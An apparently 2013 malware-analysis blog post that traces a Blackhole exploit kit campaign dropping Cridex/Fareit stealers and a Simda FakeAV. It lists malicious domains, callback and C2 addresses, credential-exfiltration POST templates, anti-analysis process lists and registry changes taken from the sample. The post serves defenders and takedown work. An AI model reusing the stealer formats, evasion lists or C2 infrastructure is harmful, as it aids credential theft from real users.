 |     |\___ ns5.famagatra.ru [famagatra.ru] (184.106.195.200) *
 |     |\___ ns1.famagatra.ru [famagatra.ru] (41.168.5.140) (cached)
 |     |\___ ns4.famagatra.ru [famagatra.ru] (203.171.234.53) (cached)
 |      \___ ns3.famagatra.ru [famagatra.ru] (210.71.250.131) (cached)
 :                  :
Tracing to fulinaohps.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns3.fulinaohps.ru [fulinaohps.ru] (210.71.250.131) Got authoritative answer
 |     |\___ ns5.fulinaohps.ru [fulinaohps.ru] (184.106.195.200) *
 |     |\___ ns2.fulinaohps.ru [fulinaohps.ru] (110.164.58.250) Got authoritative answer
 |     |\___ ns1.fulinaohps.ru [fulinaohps.ru] (41.168.5.140) Got authoritative answer
 |      \___ ns4.fulinaohps.ru [fulinaohps.ru] (203.171.234.53) Got authoritative answer
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns3.fulinaohps.ru [fulinaohps.ru] (210.71.250.131) (cached)
 |     |\___ ns5.fulinaohps.ru [fulinaohps.ru] (184.106.195.200) *
 |     |\___ ns2.fulinaohps.ru [fulinaohps.ru] (110.164.58.250) (cached)
 |     |\___ ns1.fulinaohps.ru [fulinaohps.ru] (41.168.5.140) (cached)
 |      \___ ns4.fulinaohps.ru [fulinaohps.ru] (203.171.234.53) (cached)
 :                  :
Tracing to emmmhhh.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns5.emmmhhh.ru [emmmhhh.ru] (184.106.195.200) *
 |     |\___ ns2.emmmhhh.ru [emmmhhh.ru] (110.164.58.250) Got authoritative answer
 |     |\___ ns1.emmmhhh.ru [emmmhhh.ru] (41.168.5.140) Got authoritative answer
 |     |\___ ns4.emmmhhh.ru [emmmhhh.ru] (203.171.234.53) Got authoritative answer
 |      \___ ns3.emmmhhh.ru [emmmhhh.ru] (210.71.250.131) Got authoritative answer
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns4.emmmhhh.ru [emmmhhh.ru] (203.171.234.53) (cached)
 |     |\___ ns2.emmmhhh.ru [emmmhhh.ru] (110.164.58.250) (cached)
 |     |\___ ns5.emmmhhh.ru [emmmhhh.ru] (184.106.195.200) *
 |     |\___ ns1.emmmhhh.ru [emmmhhh.ru] (41.168.5.140) (cached)
 |      \___ ns3.emmmhhh.ru [emmmhhh.ru] (210.71.250.131) (cached)
 :                  :
Tracing to errriiiijjjj.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns4.errriiiijjjj.ru [errriiiijjjj.ru] (203.171.234.53) Got authoritative answer
 |     |\___ ns2.errriiiijjjj.ru [errriiiijjjj.ru] (110.164.58.250) Got authoritative answer
 |     |\___ ns3.errriiiijjjj.ru [errriiiijjjj.ru] (210.71.250.131) Got authoritative answer
 |     |\___ ns5.errriiiijjjj.ru [errriiiijjjj.ru] (184.106.195.200) *
 |      \___ ns1.errriiiijjjj.ru [errriiiijjjj.ru] (41.168.5.140) Got authoritative answer
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns2.errriiiijjjj.ru [errriiiijjjj.ru] (110.164.58.250) (cached)
 |     |\___ ns4.errriiiijjjj.ru [errriiiijjjj.ru] (203.171.234.53) (cached)
 |     |\___ ns5.errriiiijjjj.ru [errriiiijjjj.ru] (184.106.195.200) *
 |     |\___ ns1.errriiiijjjj.ru [errriiiijjjj.ru] (41.168.5.140) (cached)
 |      \___ ns3.errriiiijjjj.ru [errriiiijjjj.ru] (210.71.250.131) (cached)
 :                  :
Tracing to ejjiipprr.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns3.ejjiipprr.ru [ejjiipprr.ru] (210.71.250.131) Got authoritative answer
 |     |\___ ns1.ejjiipprr.ru [ejjiipprr.ru] (41.168.5.140) Got authoritative answer
 |     |\___ ns2.ejjiipprr.ru [ejjiipprr.ru] (110.164.58.250) Got authoritative answer
 |      \___ ns4.ejjiipprr.ru [ejjiipprr.ru] (203.171.234.53) Got authoritative answer
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns3.ejjiipprr.ru [ejjiipprr.ru] (210.71.250.131) (cached)
 |     |\___ ns4.ejjiipprr.ru [ejjiipprr.ru] (203.171.234.53) (cached)
 |     |\___ ns1.ejjiipprr.ru [ejjiipprr.ru] (41.168.5.140) (cached)
 |      \___ ns2.ejjiipprr.ru [ejjiipprr.ru] (110.164.58.250) (cached)
 :                  :
Tracing to eiiiioovvv.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns2.eiiiioovvv.ru [eiiiioovvv.ru] (110.164.58.250) Got authoritative answer
 |     |\___ ns3.eiiiioovvv.ru [eiiiioovvv.ru] (210.71.250.131) Got authoritative answer
 |     |\___ ns4.eiiiioovvv.ru [eiiiioovvv.ru] (203.171.234.53) Got authoritative answer
 |      \___ ns1.eiiiioovvv.ru [eiiiioovvv.ru] (41.168.5.140) Got authoritative answer
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
 |\___ f.dns.ripn.net [ru] (193.232.156.17)
 |     |\___ ns4.eiiiioovvv.ru [eiiiioovvv.ru] (203.171.234.53) (cached)
 |     |\___ ns1.eiiiioovvv.ru [eiiiioovvv.ru] (41.168.5.140) (cached)
 |     |\___ ns2.eiiiioovvv.ru [eiiiioovvv.ru] (110.164.58.250) (cached)
 |      \___ ns3.eiiiioovvv.ru [eiiiioovvv.ru] (210.71.250.131) (cached)
 :                  :
Tracing to finalions.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns4.finalions.ru [finalions.ru] (203.171.234.53) Got authoritative answer
 |     |\___ ns2.finalions.ru [finalions.ru] (110.164.58.250) Got authoritative answer
 |     |\___ ns1.finalions.ru [finalions.ru] (41.168.5.140) Got authoritative answer
 |     |\___ ns3.finalions.ru [finalions.ru] (210.71.250.131) Got authoritative answer
 |      \___ ns5.finalions.ru [finalions.ru] (184.106.195.200) *
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns2.finalions.ru [finalions.ru] (110.164.58.250) (cached)
 |     |\___ ns1.finalions.ru [finalions.ru] (41.168.5.140) (cached)
 |     |\___ ns3.finalions.ru [finalions.ru] (210.71.250.131) (cached)
 |     |\___ ns5.finalions.ru [finalions.ru] (184.106.195.200) *
 |      \___ ns4.finalions.ru [finalions.ru] (203.171.234.53) (cached)
 :                  :

UPDATE: 2013, March 01
Latest domains used by this Bad Actor:

This group is continuing their criminal operation under NAUNET(Russia) rogue registrar,
registering & activated malicious domains with rogue registration (see marked words below)

registrar:     NAUNET-REG-RIPN
state:         "REGISTERED, DELEGATED, UNVERIFIED"
person:        "Private Person"

Details

New infection methods implemented:
1. Using the (suspected Geo-base)IP rotator base response to infection
2. Starting the infection of the Ransomware for the certain GeoIP.
3. The usage of fake/stolen CA certification is spotted. (thank's to @it4sec)


We monitored this activities for last 4days and exposed 2 reports of this case in 
the our beloved Pastebin with the links below:
1. http://pastebin.com/raw.php?i=YkvnFNKx
2. http://pastebin.com/raw.php?i=W40RNxnG

With the PluginDetect exposed as per below:
1. http://pastebin.com/CpRXS5m3
2. http://pastebin.com/MkYVRz4R
3. http://pastebin.com/mCJy7GEn
4. http://pastebin.com/LSUCnvN6

And the "latest" Payloads as per below:

Cridex: 
1. 6cd8ae852bd023982b292a714d3e1582537606cc655a74c1fef152742c215e00
2. 5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e
3. a54c2b298c3fc8162458889f290d2e6713a6ba45c8c697e17a333409c037bff4
4. 6ba7598df3a3111c4304f2c565ecc8307ecef504e0413c230e87ff6d845076da

Ransomer: 
1. 3cb0a852b902c1beffa70e6405825dfe71ad28141f8bcc369880af9f7e692b84
2. bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d

You'll see the LATEST popped up snapshot of download binary here:
1. http://urlquery.net/report.php?id=1039316
2. http://urlquery.net/report.php?id=1039314

This criminal group is aiming the:
1. Internet service login credentials (ftp/pop3/imap/http)
2. Online cash/transaction information
3. Phishing & fraudulence of online banking


Proof of Concept

First PoC is as per pasted stealer config file here -->>[HERE]

For the security purpose we can not report the Ransomer parts yet,
but Credential Stealer Trojan used(Cridex+Fareit) are using callbacks with 
the below details:

The below communication HTTP headers..(info for filtration purpose)

Method       : HTTP/1.1 POST
user-agent   : Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
contents-type: application/x-www-form-urlencoded
Callback IPs.. 
h00p://203.171.234.53:8080   // the url will be plus /XXX(random)/XXX(random)/XXX(random)
h00p://221.143.48.6:8080
h00p://64.85.53.168:8080
h00p://180.235.150.72:8080
h00p://213.214.74.5:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://184.106.195.200:8080
h00p://199.167.29.136:8080
h00p://62.28.244.251:8080
h00p://85.94.66.2:8080
h00p://72.251.206.90:8080
h00p://188.132.213.178:8080
h00p://78.28.120.32:8080
h00p://88.119.156.20:8080
h00p://188.117.44.241:8080
h00p://217.65.100.41:8080
h00p://37.122.209.102:8080
h00p://195.191.22.90:8080
h00p://195.191.22.40:8080
h00p://195.191.22.97:8080
h00p://195.191.22.37:8080
h00p://82.100.228.130:8080
Credential stealed with below POSTED formats:  (note: grabbed ftp/http/pop3/internet explorer/firefox/macromedia used) 
＜http time="%%%uu"＞
＜url＞＜![CDATA[%%.%us]]＞＜/url＞
＜useragent＞＜![CDATA[%%.%us]]＞＜/useragent＞
＜data＞＜![CDATA[]]＞＜/data＞
＜/http＞

＜httpshot time="%%%uu"＞
＜url＞＜![CDATA[%%.%us]]＞＜/url＞
＜data＞＜![CDATA[]]＞＜/data＞
＜/httpshot＞

＜ftp time="%%%uu"＞
＜server＞＜![CDATA[%%u.%%u.%%u.%%u:%%u]]＞＜/server＞
＜user＞＜![CDATA[%%.%us]]＞＜/user＞
＜pass＞＜![CDATA[]]＞＜/pass＞
＜/ftp＞

＜pop3 time="%%%uu"＞
＜server＞＜![CDATA[%%u.%%u.%%u.%%u:%%u]]＞＜/server＞
＜user＞＜![CDATA[%%.%us]]＞＜/user＞
＜pass＞＜![CDATA[]]＞＜/pass＞＜/pop3＞

＜cmd id="%u"＞%u＜/cmd＞

＜cert time="%u"＞
＜pass＞＜![CDATA[]]＞＜/pass＞
＜data＞＜![CDATA[]]＞＜/data＞
＜/cert＞

＜ie time="%u"＞＜data＞＜![CDATA[]]＞＜/data＞＜/ie＞ // Internet Explorer....
＜ff time="%u"＞＜data＞＜![CDATA[]]＞＜/data＞＜/ff＞  // firefox...
＜mm time="%u"＞＜data＞＜![CDATA[]]＞＜/data＞＜/mm＞  // Macromedia....
＜message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"＞
＜header＞＜unique＞%%.%us＜/unique＞＜version＞%%u＜/version＞＜system＞%%u＜/system＞＜network＞%%u＜/network＞＜/header＞
＜data＞
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
＜/data＞
＜/message＞
Supporting the stealing method/commands: 
hash
httpshots
formgrabber
httpinjects
Also supporting the file-sending method: 
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

[%S]

%S

Content-Disposition: attachment; filename=%S
With sending information to the remote malicious servers/panels below: 
h00p://37.139.47.124:80
h00p://85.143.166.72:443
h00p://62.76.177.123:80/if_Career/(admin.php)
IMPORTANT! The GeoIP scheme used to rotate request is matched with the below : 
http://ondailybasis.com/blog/?p=1483 by @it4sec
Research Materials
Samples Collected -->>[HERE]We recorded PCAP up to 1700+ sec of a last infection-->>[HERE]
Just block this now: 84.23.66.74195.210.47.208210.71.250.131 < new IP for： emmmhhh.ru | errriiiijjjj.ru | ejjiipprr.ru | eiiiioovvv.ru
— Malware Crusaders (@MalwareMustDie) February 20, 2013
Additional: Thu Feb 21 18:33:41 JST 2013 The PWS Stealer (Cridex drops Fareit) distributed via BHEK, VT: 6ba7598df3a3111c4304f2c565ecc8307ecef504e0413c230e87ff6d845076daLanding page: h00p://faneroomk.ru:8080/forum/links/column.php  IP: 77.120.103.221, 84.23.66.74, 210.71.250.131 Landing page + PDF infector PoC http://urlquery.net/report.php?id=1057467Payload Url: h00p://faneroomk.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&re=2v:1k:1m:32:33:1k:1k:31:1j Payload PoC: http://urlquery.net/report.php?id=1057662*) thanks to @PhysicalDrive0 for landing page urlquery info.
The below crusaders is supporting this investigation: @Hulk_Crusader. @it4sec, @RazorEQX, @unixfreaxjp, @PhysicalDrive0

How the adventure started..

Suddenly an Anti-Virus scan begins to run. After a few moments Dr. Banner is informed that his machine has numerous infections.

"Windows Security Alert? Trojan Downloaders and Encoders?"
"What the...?? I'm not even using a Windows machine!"
Suddenly Dr. Banner realizes what has occurred... his heart rate begins to race.

The transformation begins...

The Nature of Infection

Where David Banner once stood is now a raging green beast.
The enraged Hulk roars, "RRRAAARRGHH!!!! Why can't puny malware -
leave Hulk alone??"

Taking a closer look, Hulk notices the evil culprit; 
injected Javascript from h00p://anie50sdark.rr.nu/nl.php?p=d 

The general chain of events showing the level of complexity of this malware..
Additional details can be found here -->>[pastebin link here]

Please note, these domains are dynamic & always changing,
so each interaction may be different as per below scheme:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 04 Feb 2013 17:39:16 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.8
"Set-Cookie: ac5abc2a99=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: public, must-revalidate"
Content-Length: 953344
Content-Disposition: attachment; filename=scandsk.exe
Content-Transfer-Encoding: binary

After completion the user is presented with a convincing dialog box with the option to "remove all" detected malware.

When Hulk clicks anywhere on the message he is prompted to download FakeAV the "scandsk.exe".
As if possessed, the Hulk screams, "RRAAAARRRGGHHHH!!!
"CRUCESIGNATORUM!!! - Hulk summons his friends, the Malware Crusaders to assist with dissecting this evil software.

Meanwhile all of the operations stated above can be download as PCAP here -->>[MediaFire]

Malware Analysis

Erm.. Hi. this is @malwaremustdie.. I just (somehow) got summoned by Hulk,
if I understand his words (behind his anger roars) correctly, he wanted 
us to.. err.. #SMASH!?? (peeking at Hulk..sweating) Obviously No! 
To analyze the malware he found. :-)

As no one can say no to Hulk in this mode, and to avoid his neighbors calling 
the police so we must get done to it fast, and here we go:

The malware looks like the below icon (Hulk had some collection)

And I am looking at the recent one with the below hash..
Sample : "scandsk.exe"
Size: -rwxr--r--  1 hulk  green "953,344" scandsk.exe
MD5    : "bb21db6128c344ded94cda582f6d549f"
SHA256 : "8ca233cbefc68c39e1210ad9b7ed8d558a3a4939546badbcc4eed53a81f62670"
Is a PE with Sections: 
   .text 0x1000 0x20d30 135168
   DATA 0x22000 0x4dca6 155648
   DATA 0x70000 0x449be 169984
   INIT 0xb5000 0x5d50a 186368
   INIT 0x113000 0x40aac 265216
   .rsrc 0x154000 0x955c 38912
   .reloc 0x15e000 0x16c 1024
More info: 
Entry Point at 0xe66f
Virtual Address is 0x40f26f
Fake compile time: 2008-08-06 15:52:29
Wrong CRC, Claimed:  992898 Actual:  977558
Invalid import segment, and most of the sections are crypted.
A quick scan in VT -->>[HERE] will show these Malware Names: 
MicroWorld-eScan         : Gen:Variant.Kazy.132675
nProtect                 : Backdoor/W32.Simda.953344
Malwarebytes             : Trojan.Agent.AFF
TheHacker                : Trojan/Simda.b
ESET-NOD32               : Win32/Simda.B
Avast                    : Win32:MalOb-IJ [Cryp]
Kaspersky                : Backdoor.Win32.Simda.pvc
BitDefender              : Gen:Variant.Kazy.132675
Agnitum                  : Backdoor.Simda!ZWUl9AhwKrI
Comodo                   : Backdoor.Win32.Simda.PVC
F-Secure                 : Gen:Variant.Kazy.132675
DrWeb                    : Trojan.Rodricter.21
VIPRE                    : Backdoor.Win32.Simda.b (v)
AntiVir                  : TR/Dropper.Gen
Sophos                   : Mal/Simda-G
Jiangmin                 : Backdoor/Simda.bfh
Kingsoft                 : Win32.Hack.Simda.p.(kcloud)
GData                    : Gen:Variant.Kazy.132675
AhnLab-V3                : Backdoor/Win32.Simda
Ikarus                   : Win32.SuspectCrc
Fortinet                 : W32/Simda.B!tr
AVG                      : Dropper.Generic7.BEOR
Panda                    : Suspicious file
In the binary, after de-packed, it was seen below malicious actions:  Self-renamed: 
%Temp%\1.tmp 
And copied itself to the  
%appdata%\ScanDisc.exe
Drop components s.exe, d.sys, s.sys : 
c%systemroot%\system32
%s\%s.exe
%%TEMP%%\%d.sys
fastfat
%systemroot%\system32\drivers
%s\%s.sys
%AppData%\dexplorer.exe
Using CMD to register itself as highest task & execution component binary: 
cmd.exe
＜Actions
task%d＞
\\?\globalroot\systemroot\system32\tasks\
＜Principals＞
＜Principal id="LocalSystem"＞
＜UserId＞S-1-5-18＜/UserId＞
＜RunLevel＞HighestAvailable＜/RunLevel＞
＜/Principal＞
＜/Principals＞
＜Actions Context="LocalSystem"＞
＜Exec＞
＜Command＞%s＜/Command＞
＜/Exec＞
＜/Actions＞
＜/Task＞
dexplorer.exe
It then detected these softwares: 
cv.exe
irise.exe
IrisSvc.exe
wireshark.exe
dumpcap.exe
ZxSniffer.exe
Aircrack-ng Gui.exe
observer.exe
tcpdump.exe
WinDump.exe
wspass.exe
Regshot.exe
ollydbg.exe
PEBrowseDbg.exe
windbg.exe
DrvLoader.exe
SymRecv.exe
Syser.exe
apis32.exe
VBoxService.exe
VBoxTray.exe
SbieSvc.exe
SbieCtrl.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
SUPERAntiSpyware.exe
ERUNT.exe
ERDNT.exe
EtherD.exe
Sniffer.exe
CamtasiaStudio.exe
CamRecorder.exe
Software\CommView
SYSTEM\CurrentControlSet\Services\IRIS5
Software\eEye Digital Security
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
SOFTWARE\ZxSniffer
SOFTWARE\Cygwin
SOFTWARE\Cygwin
SOFTWARE\B Labs\Bopup Observer
AppEvents\Schemes\Apps\Bopup Observer
Software\B Labs\Bopup Observer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
Software\Win Sniffer
SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
SYSTEM\CurrentControlSet\Services\SDbgMsg
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
Software\Syser Soft
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
SOFTWARE\APIS32
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
SYSTEM\CurrentControlSet\Services\VBoxGuest
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
SYSTEM\CurrentControlSet\Services\SbieDrv
Software\Classes\Folder\shell\sandbox
Software\Classes\*\shell\sandbox
SOFTWARE\SUPERAntiSpyware.com
SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
SOFTWARE\SUPERAntiSpyware.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1
If one of these are found somehow malware will not infect properly. If it infects, it will run these operations:  Changes your registry PC's DNS server setting into 8.8.8.8 + 192.168.0.1   
HKLM\​SYSTEM\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Interfaces\​{101AD58A-72E3-4831-9F1E-01C7C72E2FAB}
　→"8.8.8.8,192.168.0.1"
HKLM\​SYSTEM\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Interfaces\​{1AD45B38-4060-4F73-BB1E-A0439A2D97EB} 
→"8.8.8.8,192.168.0.1"
Changing the policy regarding to temporary data: 
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA
Temp\Low
Selfrunning itself using Runonce: 
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
opt
%TEMP%
C:\Documents and Settings\$USER\
\scandsk.exe
Cleaning your hosts data by rewriting clean hosts file: 
"C:\Windows\system32\drivers\etc\hosts.txt"
# Copyright (c) 1993-2006 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
# For example:
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
"127.0.0.1       localhost
::1             localhost"
# Copyright (c) 1993-2006 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
# For example:
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
"127.0.0.1       localhost
::1             localhost"
Changing your search engine setting into ... h00p://findgala.com (?) 
\Software\Microsoft\Internet Explorer\SearchScopes
DefaultScope
URL
\searchplugins\
search.xml
＜ShortName＞search＜/ShortName＞
＜SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/"＞
＜Description＞Search for the best price.＜/Description＞
＜InputEncoding＞windows-1251＜/InputEncoding＞
"h00p://findgala.com/?"
＜Url type="text/html" method="GET" template="%s"＞
＜Image width="16" height="16"＞data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8MDDxMX2qKTIw0RK10eYD6QYqATvoPBkt3f5K0W9Ew4fjTFz%2F%2Bw8Dm3W8UPeZxqFa%2BevsFyD0twgfVsOfkRxHrtfV9u5BVQ8Crd98%2FffkGYQM1QJ20%2FfSPv79eNxQGYfpSVJADmcvEAHbr7oOX2dj%2FERNKIA2%2F%2F%2Fz%2FxfCDhYVoDUDw5P6vf9%2B5iY0HVmZGQWm%2BN3fff%2Fn2k4eLHS739x%2FDiRs%2Ff%2F%2F5x8HO%2FOHzN3djfqgNjIwMgc6qzLx%2Fpy47j2zY%2Feff06tXhOUucgxeun33AUZGpHh4%2Bvo7t8EyIJqz%2FhpasD59%2B5dNrqdnznZIsEL9ICXCsWuBCwvTv%2FymS5PWPP32ExEALz%2F%2BB5r848cPCJcRaMP9xaYQzofPPzfuvrnj0Jst%2B5%2F8%2Bc4sLPeDkYlRgJc93VPE18NIXkYUmJYQSQMZ%2FP3379uPH7%2F%2F%2FEETBzqJ0WqLGvFpe2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D＜/Image＞
＜Param name="q" value="{searchTerms}"/＞
＜Param name="uid" value="%d"/＞
＜/Url＞
＜/SearchPlugin＞
We detect the attempt for spam setting spf record: 
v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all
↑which ip4:%d.%d.%d.%d/%d is the malicious IP.  Detecting attempt to networking to remote hosts: 46.105.131.123:80 Communicating with remote hosts with the method: 
HTTP/1.1, GET, HEAD or POST
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
User-agent: IE7
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
With the HTTP operations of: 
HTTP/1.1 GET /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
Host: "update1.randomstring.com"

HTTP/1.1 HEAD /update_c1eec.exe
Host: "update1.randomstring.com"

HTTP/1.1 POST
Host: "update1.randomstring.com"
User-Agent: IE7
Build/13.0
patch:0
Version/10.0
ver:2.0
update/0
Mod/0
Service 1.0
lib/5.0
Library1.0
App/7.0
compat/0
feed/7.1.0
system:3.0
control/5.0
Engine/4.0
runtime 11.0
layout/2.0
Build/14.0
patch:10
Version/11.0
ver:3.0
update/10
Mod/3.0
Service 2.0
lib/6.0
Library2.0
App/8.0
compat/4.1.0
feed/7.2.0
system:4.0
control/6.0
Engine/5.0
runtime 12.0
layout/3.0
Build/15.0
patch:20
Version/12.0
ver:4.0
update/20
Mod/4.0
Service 3.0
lib/7.0
Library3.0
App/9.0
compat/4.2.0
feed/7.3.0
system:5.0
control/7.0
Engine/6.0
runtime 13.0
layout/4.0
If we  execute this scandsk.exe, it goes like this: Soon after just sitting there, the CPU resource will boil up and  we'll find that network request started to be sent like: That's my analysis, a FakeAV, sending your data + other malware's downloader. It doesn't do the ransom, will annoy you and make you pay. I'll pass you back to Hulk :-) 

Epilogue

Samples & Research Data

Malware Network ID Analysis

The FakeAV download url: update1.randomstring[.]com/update_c1eec.exe
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name:        RANDOMSTRING.COM
Created on:         30-May-03
Expires on:         30-May-13
Last Updated on:    01-Mar-11
Registrant:
"Happy Dude <==LAME 
1 Happy St <==LAME
HAPPYTOWN  <==LAME
QLD, None Selected 4000 <==LAME"
Australia
The FakeAV callback IP 46.105.131.123 
inetnum:        46.105.131.120 - 46.105.131.127
"netname:        marysanders1
descr:          marysanders1net
country:        IE (Ireland, Dublin)"
org:            ORG-OH5-RIPE
admin-c:        OTC9-RIPE
tech-c:         OTC9-RIPE
status:         ASSIGNED PA
route:          46.105.0.0/16
descr:          OVH ISP
descr:          Paris, France
origin:         AS16276
mnt-by:         OVH-MNT
source:         RIPE # Filtered
FakeAV download server: www2.f2ep4pjzr9a7e2.gw.lt 
gw.lt   internet address = 78.60.187.24
        primary name server = ns1.afraid.org
        responsible mail addr = dnsadmin.afraid.org
        serial  = 1302230009
        refresh = 86400 (1 day)
        retry   = 7200 (2 hours)
        expire  = 2419200 (28 days)
        default TTL = 3600 (1 hour)
gw.lt   MX preference = 20, mail exchanger = alt1.aspmx.l.google.com
gw.lt   MX preference = 20, mail exchanger = alt2.aspmx.l.google.com

"can't trace the whois db..."
$ whois gw.it
Domain:             gw.it
"Status:             UNASSIGNABLE <== marked"

"but practically is up & alive.."
serial 2013022313 +-a.dns.it (194.0.16.215)
serial 2013022313 | +-c.dns.it (194.0.1.22)
serial 2013022313 | | +-dns.nic.it (192.12.192.5)
serial 2013022313 | | | +-m.dns.it (217.29.76.4)
serial 2013022313 | | | | +-nameserver.cnr.it (194.119.192.34)
serial 2013022313 | | | | | +-r.dns.it (193.206.141.46)
serial 2013022313 | | | | | |  +-s.dns.it (194.146.106.30)
The FakeAV used redirector service: Dynamic DNS provided by ChangeIP.com 
Domain Name: LFLINK.COM
Registrant:
"Network Operations, ChangeIP"
   1200 Brickell Avenue
   Suite 1950
   Miami, FL 33131, US
"Domain servers in listed order:
   NS1.CHANGEIP.ORG             209.208.5.13
   NS3.CHANGEIP.ORG             208.85.240.112
   NS2.CHANGEIP.ORG             204.16.175.12
FakeAV TDS domain RR.NU(redirected by Sitelutions Redirection Engine): 
.NU Domain Ltd Whois service
Domain Name (ASCII): rr.nu
Technical Contact:"
